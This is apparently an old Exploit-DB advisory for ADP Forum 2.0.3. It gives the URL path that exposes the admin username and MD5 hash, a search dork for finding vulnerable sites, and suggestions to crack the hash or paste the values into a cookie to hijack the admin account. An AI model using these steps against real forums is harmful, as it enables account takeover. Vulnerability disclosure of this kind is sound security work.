Vz (Adp) Forum 2.0.3 - Remote Password Disclosure

EDB-ID:

3053




Platform:

PHP

Date:

2006-12-31


##########################################################################################################
#Sv(ADP) Forum 2.0.3 Remote Password Disclosure Vulnerablity                 
##########################################################################################################
#S.name:ADP Forum                                                            
#Affected version:2.0.3                                                      
#Download&Demo:http://www.linux.it/~fedro/index.php?pag=scripts&lang=en      
#Risk:Very Highly Critical                                                   
##########################################################################################################
#Author:Dr Max Virus                                                         
#Location:Egypt                                                              
##########################################################################################################
#POC:                                                                        
#http:/[target]/[path]/users/admin.txt                                       
#As We see Admin name and hash          !!!!!!!!!!!!!!!!!!!!!!!!!!
##########################################################################################################
#You can crack the password with any md5 encrypt                             
                             
#Or u can register and inject the info in any cookie editor can be in 
FireFox or Opera                   
##########################################################################################################
#Dork:ADP Forum 2.0.3 is powered by VzScripts                                
##########################################################################################################
#Thx:str0ke-koray-Timq-r0ut3r-mTk-nuffsaid-MrSwan-All Friends                
#Special Gr33ts:AsianEagle-Kacper-The master-Hotturk                         
##########################################################################################################

# milw0rm.com [2006-12-31]